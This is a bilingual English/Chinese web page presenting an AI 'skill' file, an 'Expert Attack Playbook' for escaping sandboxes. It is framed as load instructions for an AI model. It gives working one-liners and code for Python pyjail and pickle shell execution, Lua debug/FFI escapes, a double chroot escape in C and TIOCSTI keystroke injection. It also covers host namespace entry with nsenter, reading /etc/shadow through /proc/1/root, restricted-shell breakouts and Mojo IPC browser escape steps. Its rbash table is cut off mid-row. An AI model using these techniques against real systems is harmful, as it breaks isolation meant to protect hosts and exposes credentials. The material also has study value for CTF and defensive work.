Back to Details

sandbox-escape-techniques

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Sandbox Escape — Expert Attack Playbook

SKILL: Sandbox Escape — 专家攻击手册

AI LOAD INSTRUCTION: Expert sandbox escape techniques across Python, Lua, seccomp, chroot, Docker/container, and browser sandbox contexts. Covers CTF pyjail patterns, seccomp architecture confusion, chroot fd leaks, namespace escape, and Mojo IPC abuse. Distilled from ctf-wiki sandbox sections and real-world container escapes. Base models often miss the distinction between sandbox types and apply wrong escape techniques.
AI加载说明:覆盖Python、Lua、seccomp、chroot、Docker/容器、浏览器沙箱场景的专家级沙箱逃逸技术,包含CTF pyjail模式、seccomp架构混淆、chroot文件描述符泄漏、命名空间逃逸以及Mojo IPC滥用。内容提炼自ctf-wiki沙箱板块和真实场景容器逃逸案例,基础大模型通常无法区分不同沙箱类型,会误用逃逸技术。

0. RELATED ROUTING

0. 相关跳转链接

  • browser-exploitation-v8 — V8 exploitation for renderer RCE before browser sandbox escape
  • container-escape-techniques — Docker/container specific escape techniques
  • kernel-exploitation — kernel exploit for container/namespace escape
  • linux-privilege-escalation — post-escape privilege escalation
  • browser-exploitation-v8 — 浏览器沙箱逃逸前用于获取渲染器RCE的V8漏洞利用技术
  • container-escape-techniques — Docker/容器专属逃逸技术
  • kernel-exploitation — 用于容器/命名空间逃逸的内核漏洞利用技术
  • linux-privilege-escalation — 逃逸后的权限提升技术

Advanced References

高级参考资料

  • PYTHON_SANDBOX_ESCAPE.md — Full pyjail methodology: 
    __builtins__
    recovery, keyword bypass, AST bypass, pickle escape
  • SECCOMP_BYPASS.md — Architecture confusion, io_uring bypass, ptrace bypass, allowed syscall chaining
  • PYTHON_SANDBOX_ESCAPE.md — 完整pyjail方法体系:
    __builtins__
    恢复、关键词绕过、AST绕过、pickle逃逸
  • SECCOMP_BYPASS.md — 架构混淆、io_uring绕过、ptrace绕过、允许的系统调用链构造

1. SANDBOX TYPE IDENTIFICATION

1. 沙箱类型识别

Sandbox TypeIndicatorsTypical Context
Python sandbox (pyjail)Limited builtins, filtered keywords, 
exec
/
eval
available		CTF, online judges, Jupyter
Lua sandboxNo 
os
, 
io
modules; restricted metatables		Game scripting, config
seccompsyscall filtering, 
prctl(PR_SET_SECCOMP)
CTF pwn, container hardening
chrootChanged root filesystem, limited 
/proc
access		Legacy isolation
Docker/containerNamespaces, cgroups, reduced capabilitiesCloud, microservices
Browser (renderer)OS-level sandbox (seccomp-bpf + namespaces on Linux)Chrome, Firefox
Namespace isolationPID/mount/network/user namespaceContainer runtimes
沙箱类型识别特征典型场景
Python沙箱(pyjail)内置函数受限、关键词过滤、
exec
/
eval
可用		CTF、在线判题系统、Jupyter
Lua沙箱
os
io
模块;元表被限制		游戏脚本、配置系统
seccomp系统调用过滤、存在
prctl(PR_SET_SECCOMP)
调用		CTF pwn题、容器加固
chroot根文件系统被修改、
/proc
访问受限		传统隔离方案
Docker/容器命名空间、cgroups、能力集裁剪云环境、微服务
浏览器(渲染器)操作系统级沙箱(Linux上为seccomp-bpf + 命名空间)Chrome、Firefox
命名空间隔离PID/挂载/网络/用户命名空间容器运行时

2. PYTHON SANDBOX ESCAPE (OVERVIEW)

2. Python沙箱逃逸(概览)

See PYTHON_SANDBOX_ESCAPE.md for full methodology.
完整方法体系参考PYTHON_SANDBOX_ESCAPE.md

Quick Reference

快速参考

TechniqueOne-Liner
Subclass walk
().__class__.__bases__[0].__subclasses__()
→ find 
os._wrap_close
__init__.__globals__['system']
Import recovery
__builtins__.__import__('os').system('sh')
getattr bypass
getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os')
chr construction
eval(chr(95)+chr(95)+'import'+chr(95)+chr(95))
Pickle escape
pickle.loads(b"cos\nsystem\n(S'sh'\ntR.")
Code objectConstruct 
types.CodeType(...)
then 
exec()
with custom bytecode
技术单行代码实现
子类遍历
().__class__.__bases__[0].__subclasses__()
→ 找到
os._wrap_close
→ 调用
__init__.__globals__['system']
导入恢复
__builtins__.__import__('os').system('sh')
getattr绕过
getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os')
chr拼接构造
eval(chr(95)+chr(95)+'import'+chr(95)+chr(95))
Pickle逃逸
pickle.loads(b"cos\nsystem\n(S'sh'\ntR.")
代码对象构造构造
types.CodeType(...)
后传入
exec()
执行自定义字节码

3. LUA SANDBOX ESCAPE

3. LUA沙箱逃逸

Restricted Environment Bypass

受限环境绕过

lua
-- If debug library available:
debug.getinfo(1)                    -- information leakage
debug.getregistry()                 -- access global registry
debug.getupvalue(func, 1)           -- read closed-over variables
debug.setupvalue(func, 1, new_val)  -- overwrite upvalues

-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io

-- If loadstring available:
loadstring("os.execute('sh')")()

-- If string.dump available:
-- Dump function bytecode, patch it, load modified function

-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals
lua
-- If debug library available:
debug.getinfo(1)                    -- information leakage
debug.getregistry()                 -- access global registry
debug.getupvalue(func, 1)           -- read closed-over variables
debug.setupvalue(func, 1, new_val)  -- overwrite upvalues

-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io

-- If loadstring available:
loadstring("os.execute('sh')")()

-- If string.dump available:
-- Dump function bytecode, patch it, load modified function

-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals

Lua FFI Escape (LuaJIT)

Lua FFI逃逸(LuaJIT)

lua
-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")

-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry
lua
-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")

-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry

4. CHROOT ESCAPE

4. CHROOT逃逸

TechniqueConditionMethod
Open fd to real rootFile descriptor leaked from outside chroot
fchdir(leaked_fd)
then 
chroot(".")
Double chrootProcess is root inside chroot
mkdir("x"); chroot("x"); chdir("../../../..")
TIOCSTI ioctlTerminal access (fd 0 is a TTY)Inject keystrokes to parent shell via 
ioctl(0, TIOCSTI, &c)
/proc access
/proc
mounted inside chroot
/proc/1/root/
→ access real root filesystem
ptraceCAP_SYS_PTRACEAttach to process outside chroot
Mount namespacePrivilegedMount real root into chroot
技术前置条件实现方法
真实根目录文件描述符泄漏外部泄漏的文件描述符可在chroot内访问调用
fchdir(leaked_fd)
后执行
chroot(".")
双重chroot进程在chroot内拥有root权限
mkdir("x"); chroot("x"); chdir("../../../..")
TIOCSTI ioctl拥有终端访问权限(文件描述符0为TTY)通过
ioctl(0, TIOCSTI, &c)
向父shell注入按键
/proc可访问chroot内挂载了
/proc
访问
/proc/1/root/
获取真实根文件系统权限
ptrace拥有CAP_SYS_PTRACE权限附加到chroot外的进程
挂载命名空间拥有特权将真实根目录挂载到chroot内

Double Chroot Escape

双重chroot逃逸

c
// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape");          // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot(".");                     // now at real root
execl("/bin/sh", "sh", NULL);
c
// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape");          // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot(".");                     // now at real root
execl("/bin/sh", "sh", NULL);

5. BROWSER SANDBOX ESCAPE (OVERVIEW)

5. 浏览器沙箱逃逸(概览)

Chrome Sandbox Architecture (Linux)

Chrome沙箱架构(Linux)

Renderer Process:
  ├── seccomp-bpf (syscall filter)
  ├── PID namespace (isolated PIDs)
  ├── Network namespace (no direct network)
  ├── Mount namespace (minimal filesystem)
  └── Reduced capabilities (no CAP_SYS_ADMIN etc.)
Renderer Process:
  ├── seccomp-bpf (syscall filter)
  ├── PID namespace (isolated PIDs)
  ├── Network namespace (no direct network)
  ├── Mount namespace (minimal filesystem)
  └── Reduced capabilities (no CAP_SYS_ADMIN etc.)

Escape Vectors

逃逸向量

VectorDescription
Mojo IPC bugUAF or type confusion in Mojo interface handler in browser process
Shared memory corruptionCorrupt shared memory segments between renderer and browser
GPU process bugExploit GPU process (less sandboxed) as stepping stone
Kernel exploitEscape directly via kernel vulnerability (bypasses all sandboxing)
Signal handlingRace condition in signal delivery across sandbox boundary
向量描述
Mojo IPC漏洞浏览器进程中Mojo接口处理逻辑存在UAF或类型混淆
共享内存损坏破坏渲染器和浏览器之间的共享内存段
GPU进程漏洞利用沙箱限制更少的GPU进程作为跳板
内核漏洞直接通过内核漏洞逃逸(绕过所有沙箱限制)
信号处理沙箱边界信号传递过程中存在竞态条件

Mojo Interface Attack Pattern

Mojo接口攻击模式

1. Renderer RCE achieved (via V8/Blink bug)
2. Enumerate available Mojo interfaces from renderer
3. Find vulnerable interface (UAF on message handling, integer overflow in parameter validation)
4. Craft malicious Mojo message → trigger bug in browser process
5. Browser process is unsandboxed → full system access
1. 已获取渲染器RCE(通过V8/Blink漏洞)
2. 从渲染器枚举可用的Mojo接口
3. 找到存在漏洞的接口(消息处理存在UAF、参数校验存在整数溢出)
4. 构造恶意Mojo消息 → 触发浏览器进程漏洞
5. 浏览器进程无沙箱限制 → 获取完整系统权限

6. NAMESPACE ESCAPE

6. 命名空间逃逸

User Namespace Escalation

用户命名空间提权

bash
undefined
bash
undefined

If allowed to create user namespaces (unprivileged):

If allowed to create user namespaces (unprivileged):

unshare -Urm # Create new user + mount namespace as root inside
unshare -Urm # Create new user + mount namespace as root inside

Inside namespace: can mount, modify, etc.

Inside namespace: can mount, modify, etc.

Escape requires kernel bug or misconfiguration

Escape requires kernel bug or misconfiguration

undefined
undefined

PID Namespace Escape

PID命名空间逃逸

bash
undefined
bash
undefined

If /proc is from host (misconfigured container):

If /proc is from host (misconfigured container):

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Enters init process namespaces → host access

Enters init process namespaces → host access

undefined
undefined

Mount Namespace Tricks

挂载命名空间技巧

bash
undefined
bash
undefined

If can see host filesystem via /proc/1/root:

If can see host filesystem via /proc/1/root:

ls -la /proc/1/root/ # host root filesystem cat /proc/1/root/etc/shadow # read host files
ls -la /proc/1/root/ # host root filesystem cat /proc/1/root/etc/shadow # read host files

If can mount:

If can mount:

mount -t proc proc /proc
mount -t proc proc /proc

Access host /proc entries

Access host /proc entries


---

---

7. RBASH / RESTRICTED SHELL ESCAPE

7. RBASH / 受限SHELL逃逸

TechniqueMethod
vi/vim
:!/bin/bash
or 
:set shell=/bin/bash
then 
:shell
less/more
!/bin/bash
awk
awk 'BEGIN {system("/bin/bash")}'
find
find / -exec /bin/bash \;
python/perl/ruby
python -c 'import pty;pty.spawn("/bin/bash")'
ssh
ssh user@host -t /bin/bash
Environment
export PATH=/usr/bin:/bin; /bin/bash
cpCopy 
/bin/bash
to allowed directory
git
git help config
→ then 
!/bin/bash
in pager
Encoding`echo /bin/bash
技术实现方法
vi/vim执行
:!/bin/bash
:set shell=/bin/bash
后执行
:shell
less/more执行
!/bin/bash
awk执行
awk 'BEGIN {system("/bin/bash")}'
find执行
find / -exec /bin/bash \;
python/perl/ruby执行
python -c 'import pty;pty.spawn("/bin/bash")'
ssh执行
ssh user@host -t /bin/bash
环境变量执行
export PATH=/usr/bin:/bin; /bin/bash
cp
/bin/bash
复制到允许访问的目录
git执行
git help config
→ 在分页器中执行
!/bin/bash
编码绕过执行`echo /bin/bash

8. DECISION TREE

8. 决策树

What type of sandbox?
├── Python sandbox (pyjail)?
│   └── See PYTHON_SANDBOX_ESCAPE.md
│       ├── __builtins__ available? → direct import
│       ├── Subclass walk: ().__class__.__bases__[0].__subclasses__()
│       ├── Keywords filtered? → chr()/getattr() construction
│       └── eval/exec available? → code object manipulation
├── Lua sandbox?
│   ├── debug library available? → getregistry/getupvalue
│   ├── FFI available (LuaJIT)? → ffi.C.system()
│   ├── loadstring available? → load arbitrary code
│   └── All restricted? → metatable chain exploitation
├── seccomp filter?
│   └── See SECCOMP_BYPASS.md
│       ├── Architecture confusion (32-bit syscalls from 64-bit)
│       ├── Allowed syscalls → ORW chain
│       ├── io_uring allowed? → bypass via io_uring
│       └── ptrace allowed? → debug child process
├── chroot jail?
│   ├── Root inside chroot? → double chroot escape
│   ├── Leaked fd? → fchdir to real root
│   ├── /proc mounted? → /proc/1/root access
│   └── Terminal access? → TIOCSTI injection
├── Container / Docker?
│   ├── Privileged container? → mount host, load kernel module
│   ├── Mounted docker.sock? → docker API → escape
│   ├── See ../container-escape-techniques/SKILL.md
│   └── Kernel exploit → full escape
├── Browser sandbox?
│   ├── Have renderer RCE? → target Mojo IPC for browser escape
│   ├── GPU process accessible? → less-sandboxed stepping stone
│   └── Kernel exploit → bypass sandbox entirely
└── Restricted shell (rbash)?
    └── Find any interactive program (vi, less, python, awk, git)
当前沙箱类型是什么?
├── Python沙箱(pyjail)?
│   └── 参考PYTHON_SANDBOX_ESCAPE.md
│       ├── __builtins__可用? → 直接导入
│       ├── 子类遍历: ().__class__.__bases__[0].__subclasses__()
│       ├── 关键词被过滤? → chr()/getattr()拼接构造
│       └── eval/exec可用? → 代码对象操作
├── Lua沙箱?
│   ├── debug库可用? → getregistry/getupvalue
│   ├── FFI可用(LuaJIT)? → ffi.C.system()
│   ├── loadstring可用? → 加载任意代码
│   └── 所有功能都受限? → 元表链利用
├── seccomp过滤器?
│   └── 参考SECCOMP_BYPASS.md
│       ├── 架构混淆(64位环境调用32位系统调用)
│       ├── 允许的系统调用 → ORW链构造
│       ├── io_uring可用? → 通过io_uring绕过
│       └── ptrace可用? → 调试子进程
├── chroot监狱?
│   ├── chroot内拥有root权限? → 双重chroot逃逸
│   ├── 存在泄漏的文件描述符? → fchdir到真实根目录
│   ├── /proc已挂载? → 访问/proc/1/root
│   └── 拥有终端访问权限? → TIOCSTI注入
├── 容器 / Docker?
│   ├── 特权容器? → 挂载主机目录、加载内核模块
│   ├── 挂载了docker.sock? → 调用docker API实现逃逸
│   ├── 参考../container-escape-techniques/SKILL.md
│   └── 内核漏洞 → 完全逃逸
├── 浏览器沙箱?
│   ├── 已获取渲染器RCE? → 针对Mojo IPC实现浏览器逃逸
│   ├── 可访问GPU进程? → 利用沙箱限制更少的跳板
│   └── 内核漏洞 → 完全绕过沙箱
└── 受限shell(rbash)?
    └── 寻找任意交互式程序(vi, less, python, awk, git)